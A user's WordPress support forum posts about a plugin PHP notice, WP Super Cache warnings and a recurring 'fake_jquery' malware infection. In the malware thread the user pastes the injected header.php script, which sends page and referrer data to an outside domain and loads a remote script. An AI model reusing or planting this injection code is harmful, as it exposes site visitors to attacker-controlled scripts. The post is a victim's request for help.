liemng007
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Hi Michael,
I just updated to Version 2.9 and still see that error on the category archive:
“Notice: Undefined variable: post_type in /home/accouuntA/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php on line 4251”
Is this error solely on the free version of your plugin? Would the paid version get rid of this error? I’m really frustrated with this.
Thanks,
Liem
Yes. Here are the plugins I’m using:
#1. AdThrive Ads
#2. Advanced Ads
#3. All In One SEO Pack
#4. Better Search Replace
#5. Contact Form 7
#6. Imagify
#7. OneSignal Push Notifications
#8. Pretty Links
#9. Social Warfare
#10. Social Warfare – Pro
#11. Thrive Architect
#12. Wordfence Security
#13. WP Rocket
#14. WP Ultimate Recipe Premium
#15. Yet Another Related Posts PluginI’m also using FocusBlog theme by ThriveThemes
Thanks,
Liem
Hmmm I’m not a technical person. Does it mean this issue will be fixed when the next version of All in One SEO is released? Thank you!
Forum: Plugins
In reply to: WordPress Blog Infected With Malware – Malware.fake_jquery.001Hi rngdmstr, Isaw that article and I removed the malware from header.php and update everything. However the malware still come back.
That article also say ” check for the jquery.min.php in the /js directory.”
I try to find that code in the js directory but it’s not there. I’m not sure where on the server that the malware get injected automatically again.
Thanks for your suggestion anyway.
Any other advice would be greatly appreciated.
Forum: Plugins
In reply to: WordPress Blog Infected With Malware – Malware.fake_jquery.001Yes I removed it from The Theme Header (header.php) and it’s all good then the next they it comes back again.
Here’s the new code:
<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://wildwillis.net/js/jquery.min.php”; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
Does anyone know how to solve this problem please?
Forum: Plugins
In reply to: [WP Super Cache] Mystery Files Being Added to Supercache DirectoryOh by the way here’s another message I got:
“WP Super Cache Warning!
Your server is configured to show files and directories, which may expose sensitive data such as login cookies to attackers in the cache directories. That has been fixed by adding a file named index.html to each directory. If you use PHP or legacy caching, consider moving the location of the cache directory on the Advanced Settings page.
If you just installed WP Super Cache for the first time, you can dismiss this message. Otherwise, you should probably refresh the login cookies of all logged in WordPress users here by clicking the logout link below.
The logout link will log out all WordPress users on this site except you. Your authentication cookie will be updated, but you will not be logged out.”What do you think?
Forum: Plugins
In reply to: [WP Super Cache] Mystery Files Being Added to Supercache DirectoryI think that WP SuperCache got Infected With Malware.
I have many wordpress sites got the MW:JS:GEN2?web.js.malware.fake_jquery.001 code on it and WordFence shows the affected pages are under /wp-content/cache/supercache/
Is it WP Super Cache a must to use? Can I just simply delete it forever and don’t have to use it?
Forum: Plugins
In reply to: WordPress Blog Infected With Malware – Malware.fake_jquery.001Yes I cleaned it up by removing the script from theme editor and it’s fine for 1 week and now it’s back again! Any better way please? 🙁